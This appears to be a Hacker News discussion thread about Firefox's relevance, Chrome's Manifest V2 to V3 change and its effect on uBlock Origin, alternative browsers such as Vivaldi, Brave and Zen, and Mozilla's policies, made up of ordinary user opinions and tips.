I kinda wondered myself if this was some kind of coordinated effort to make Firefox not work. It wouldn't surprise me if it was later discovered that Google paid some Linux subsystem maintainer to slip in some nefarious code somewhere that altered the way Linux implements rendering specifications ever so slightly such that Firefox appeared broken. Just the conspiracy theorist in me.

Slack "huddles" (video chat) work on everything except Firefox+Linux. Haven't tried changing my user agent yet, only just got onto Slack for work.

This one is specifically Linux (Wayland). if you set your user agent to Macintosh it will work; or at least it did a few months ago when I came across this. I've since resigned to using the electron bundle.

Google meet, Discord, Zoom all handle Mozilla/Linux. Slack hasn't figured it out yet.


You can change your UA and add Sec-CH-UA to match Chromium if you want to avoid the (non-ADA compliant) browser bias.

name any of them?

What doesn’t work? It’s my daily driver and it renders every website I visit.

I daily Zen (Firefox under the hood) and the only thing that I consistently need to open other browsers for is direct USB support (mouse/keyboard drivers in the browser). Other than that, I don't remember when was the last time something wasn't working in Firefox.

It’s also the sole reason I use Firefox as my primary browser.

God bless Firefox!

You can also run Ad Nauseum if you want to

We need our own browsers. Relying on corporations does not work - they constantly betray and abuse us. Evidently Google is the number #1 troublemaker here, due to the addiction to adRevenue into adChromium, but you can replace this with any other private company and the basic problem will be the same.

We need a variant of the world wide web that can not be abused and controlled like Google shows right now. Firefox will not change anything anymore either.


Like this.

Would you do something using their engine?

Something like Ladybird?

Or 1 fully from scratch like Medici on GitHub?


Vivaldi 8.1 still supports it (Chromium 150) as loaded unpacked extension.

Edit: and latest August 14, 2026 Chromium 152.0.7977.38 based Snapshot https://vivaldi.com/blog/desktop/address-field-calculator-an... has this in patch notes:

"[Extensions] Re-enable and extend Manifest V2 extension support for the time being (VB-130324)"


I wouldn't be sure this is a long term solution. Maintaining a this into perpetuity would probably take a lot of resources that Vivaldi team might not have.

Unless upstream introduces breaking changes I don't see why not. Google was killing this functionality for policy reasons, not because changes to the renderer required it or something. And LLM analysis is going to make maintaining forks easier going forward.

For all possible MV2 extensions this is unsustainable for a small company. Supporting just uBO used by tens of millions of people? pretty doable as it only relies on few hooks into C functions that arent going anywhere.

What about Brave?

Lots of browsers have built-in adblockers that use the same lists as uBlock Origin. Why it's important to support the extension? We have adblocking anyway.

But also, be Mozilla: decimate your own plugin ecosystem, kill half of plugins, force to rewrite the other 50%. But a few years later support this 1 extension, and people will remember that you're a good guy.

When they've adoped Chrome plugins, they've effectively gave up their shares of relevance to Chrome and now they're paying for it.


It's not the uBlock Origin extension that needs saving for "better" adblocking, it's the capabilities of the now discontinued by Google / Chrome extension supporting framework known as Manifest V2.

The 'newer' Manifest V3 replaced the V2 webRequest API with a more limited declarativeNetRequest API.

The original allowed the intercept and blocking of network requests in real-time as generated, the replacement allows a limited subset of filter blocking after requests have been sent and returned.

ie: V2 allowed for less network traffic and greater amount of filtering, V3 provides slower page completes and limited filtering.


Manifest V2 functionality that has been cut out was used only in adblockers, right?

And we have adblockers built-in in various browsers now.

So since we have built-in adblockers, we don't really need MV2 functionality anymore? Why oppose MV3?

I mean why people want to oppose MV3 instead of simply asking your favorite browser to expose the browser-specific API for missing functionality, like it was done "in the old days"?

If Google wants to block MV3, then let it block it, and ask browsers to expose missing API. Of course this won't happen in Chrome, but back in my days when software was limited, we simply stopped using it in favor of more complete software.


I'd suggest you sleep on that comment and come back with fresh eyes and a clear head; as is, the logic isn't as joined up as you might think.

I'm afraid I've already spent many nights sleeping on that exact same view.

If you're more enlightened, then the best you can do is to explain it to lesser beings, not virtue signal that you know better but others are unworthy of your knowledge.


mv2 can stop tracking in ways mv3 cannot.

I understand that. But multiple browsers have cloned uBlock-like ad blocking as their core functionality. For example Vivaldi, Brave. And they don't need MV2 to block ads, and use uBlock filters (easylist, abp filters, etc). So they block ads even if they don't support MV2 anymore.

If you understand that, then why are you saying we don’t need MV2. MV2 does more. It’s better.

We need MV2. But we can't get it. Google is stronger. So instead of fighting for MV2, I say we fight for another set of browser-specific APIs in browsers other than Google's.

1. Vivaldi supports uBlock Origin, if you consider Firefox a "major browser" then sure also Vivaldi and Brave are major browsers

2. while I use uBlock Origin on phone (Firefox) and desktop (Vivaldi), it's overrated, AdGuard works under MV3 AND unlike uBlock supports element picker, so if I was on browser not supporting uBO I would switch to AdGuard since I can't live without element picker


uBO Lite does support "element picker", it's called "Create a custom filter" in popup panel.

Attestion (now via captcha) means that websites will presumably block Firefox and Google’s attempt to murder the web will be complete.

also Firefox is the last with widevine support which many video sites demand

all those chromium clones will not have widevine

(if youtube ever gets widevine, yt-dlp etc will never work anymore)

Firefox for the win, it needs guaranteed survival somehow


Do people not remember Firefox changing their terms of service last year and allowing them to sell your data to third parties? I don't get it did people forget?

I switched over to LibreWolf and other browsers like that then and never looked back.


They rewrote the terms almost immediately after the backlash. They also claimed the original terms were written in response to the overly broad legal definitions of "data sales" under laws like the CCPA. Which tbh sounds reasonable

proof?



We all just either memory-holed it or convinced ourselves that it wasn't what it was. Easy to think you just misunderstood what they said, even though they were very explicit about it.

I'm not sure why you're being downvoted; you're right. Firefox the browser is an amazingly capable tool but I wish it was shepherded by an org that prioritized its users' interests (privacy, performance, etc.) instead of ramming AI, crypto or cute marketing campaigns that NOBODY wants into its flagship offering.

what crypto was rammed into firefox?

Wait until google cuts their funding unless they cut the ad blockers

Uhhh brave?

[flagged]


"Never" is not true, it used to be a major browser. Now, though, sadly it isn't major.

I believe it is. 2% of global internet traffic.

How is 2% major though? (I wish FF was more used!)

Firefox has 8-9% desktop market share in Europe, 16-18% in Germany. So in some important markets it’s still pretty relevant.

It's more than 2% when you condition on things like "lives in US" or "lives in EU" or "is using a desktop." e.g. among German desktop users it's apparently more like 20%. Most people probably aren't targeting global traffic and should never consider it since it can be extremely misleading.

Wasn't Opera's (the good old Presto one) marketshare also 1% back then? And it was still considered major (even though it had compatibility problems mainly caused by sites ignoring the standard)

One in every 50 people is a lot of people.

Over 6% on desktop (which is where I do the bulk of my browsing...).

More than Safari.


It's in the top 5.

It isn't more used because one browser is promoted by the biggest search engine and thus has two thirds of the market, and the other two come pre-installed with the OS.


The Web needs to die.

The way to do that is to build a better replacement that the web can't emulate.

What's preventing anyone to just spend some tokens and bring it back and fork Chrome? I think ungoogled Chromium still supports it, right?

If you don't care about DRM content, bookmark syncing etc, sure, use a bare minimum chromium fork with the patch.

But that's not what most users, including uBlock origin users, want.


I'm just waiting for Apple's OS level AI that lets me block ads in all apps, including the App Store

Too bad Firefox isn't a major browser.

And it shouldn't be. It's now full of ads for Mozilla VPN and stuff. We need the engine, but not the browser.


I've never seen an ad for Mozilla VPN, nor any other Mozilla product, in Firefox.

However I have seen billions of ads on google.com and YouTube.com, and search placement, and fraud.

But whatever. How's google pay? Pretty good?


The benefit of open source here is there are forked versions of it you can download.

Exactly. I suggest Zen.

And who is going to finance that?

Anyone can build a custom extension to do anything an extension is allowed to do. I had ~7 standard extensions that I pretty much always install into chrome browser. Over the past month or so I've been using Claude code to build a single custom extension that handles all of the things I used 7 extensions for previously. One extension does everything. You can even use the existing extensions you already use as guides for Claude to make sure all of the features you want are included. One extension to rule them all!

>Anyone can build a custom extension to do anything an extension is allowed to do

Yes, that's why google moved to manifest v3 and extensions can't do as much.


Can't they just modify the browser itself with an injection into the executable

surely there is a way around that


Operative work there is 'just'

okay and AI makes that easier than ever?

Have a MVP?



Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: